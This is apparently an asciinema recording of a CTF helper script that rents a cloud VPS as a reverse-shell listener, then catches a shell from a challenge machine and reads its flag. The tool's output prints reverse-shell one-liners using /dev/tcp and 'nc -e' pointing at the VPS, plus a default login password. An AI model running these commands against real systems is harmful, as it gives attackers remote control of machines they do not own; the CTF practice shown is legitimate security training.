{"version": 2, "width": 120, "height": 30, "timestamp": 1702972880, "env": {"SHELL": "/bin/bash", "TERM": "xterm-256color"}}
[0.054313, "o", "\u001b[?2004h\u001b]0;tj@ProbiusOfficial: /mnt/d/git/Hello_CTF-Shell\u0007\u001b[01;32mtj@ProbiusOfficial\u001b[00m:\u001b[01;34m/mnt/d/git/Hello_CTF-Shell\u001b[00m$ "]
[1.337216, "o", "p"]
[1.592925, "o", "y"]
[1.756924, "o", "t"]
[1.868954, "o", "h"]
[2.099858, "o", "\u0007on"]
[2.686835, "o", "3"]
[2.873557, "o", " "]
[3.503953, "o", "m"]
[3.667495, "o", "ain.py "]
[4.223798, "o", "\r\n"]
[4.223949, "o", "\u001b[?2004l\r"]
[4.399831, "o", "********** CTF，启动！！！ **********\r\n——反弹shell最廉价解决方案 By 探姬_Official\r\n\r\n了解你的捍卫者：\r\n>1 VPS，启动！(默认使用模块2)\r\n>2 到底要选哪个呢？(自定义启动模块)\r\n"]
[4.40001, "o", ">3 全都烧光！(退还所有实例)\r\n>>> "]
[5.45444, "o", "1"]
[6.873053, "o", "\r\n"]
[6.873981, "o", "已载入: 香港模块(公钥登录模块),配置信息为2核心2G内存,20G系统盘,10M带宽,镜像为Ubuntu Server 22.04 LTS 64位(ID:img-487zeit5)\r\n资费信息: 实例¥0.01 系统盘存储空间¥0.03 公网带宽按流量计费¥0.67/GB(香港) 每小时结算 平均资费-¥0.04/小时\r\n"]
[7.156331, "o", "在该地区查询到 1 个安全组, id为 sg-7wt7iwrd 成功创建实例 ID ins-j0i3z9je\r\n"]
[7.733576, "o", "等待实例 ins-j0i3z9je 初始化...\r\n"]
[8.485717, "o", "ubuntu@43.128.47.223 创建完成 机型 S5.MEDIUM2\r\n"]
[9.486164, "o", "初始化ssh连接...\r\n提示:您可以使用 'nc -lvnp 9001' 建立监听，在使用目标机上使用 'sh -i >& /dev/tcp/43.128.47.223/9001 0>&1' 或者 'nc 43.128.47.223 9001 -e sh' 建立反弹shell  \r\nssh ubuntu@43.128.47.223 如果非公钥登录请使用设置的密码 r00t@HelloShell \r\n"]
[10.75352, "o", "Welcome to Ubuntu 22.04 LTS (GNU/Linux 5.15.0-88-generic x86_64)\r\n\r\n * Documentation:  https://help.ubuntu.com\r\n * Management:     https://landscape.canonical.com\r\n * Support:        https://ubuntu.com/advantage\r\n\r\n  System information as of Tue Dec 19 04:02:07 PM CST 2023\r\n\r\n  System load:  0.67626953125      Processes:             119\r\n  Usage of /:   18.4% of 19.58GB   Users logged in:       0\r\n  Memory usage: 9%                 IPv4 address for eth0: 172.19.0.19\r\n  Swap usage:   0%\r\n\r\n * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s\r\n   just raised the bar for easy, resilient and secure K8s cluster deployment.\r\n\r\n   https://ubuntu.com/engage/secure-kubernetes-at-the-edge\r\n\r\n"]
[11.793435, "o", "To run a command as administrator (user \"root\"), use \"sudo <command>\".\r\nSee \"man sudo_root\" for details.\r\n\r\n"]
[11.923311, "o", "\u001b[?2004h\u001b]0;ubuntu@VM-0-19-ubuntu: ~\u0007\u001b[01;32mubuntu@VM-0-19-ubuntu\u001b[00m:\u001b[01;34m~\u001b[00m$ "]
[12.22943, "o", "\u001b[7mnc -lvnp 9001\u001b[27m"]
[13.176073, "o", "\u0007"]
[13.176327, "o", "\b\b\b\b\b\b\b\b\b\b\b\b\bnc -lvnp 9001"]
[13.569568, "o", "\r\n\u001b[?2004l\r"]
[13.576763, "o", "Listening on 0.0.0.0 9001\r\n"]
[14.605474, "o", "Connection received on 1.14.71.254 46375\r\n"]
[15.819826, "o", "c"]
[15.938022, "o", "a"]
[16.178798, "o", "t"]
[16.36624, "o", " "]
[16.801566, "o", "/"]
[17.316992, "o", "f"]
[17.520704, "o", "l"]
[17.605282, "o", "a"]
[17.707519, "o", "g"]
[18.062859, "o", "\r\n"]
[18.31438, "o", "NSSCTF{3d8af4ea-61d3-4651-8e00-2394b3f5ad4a}\r\n"]
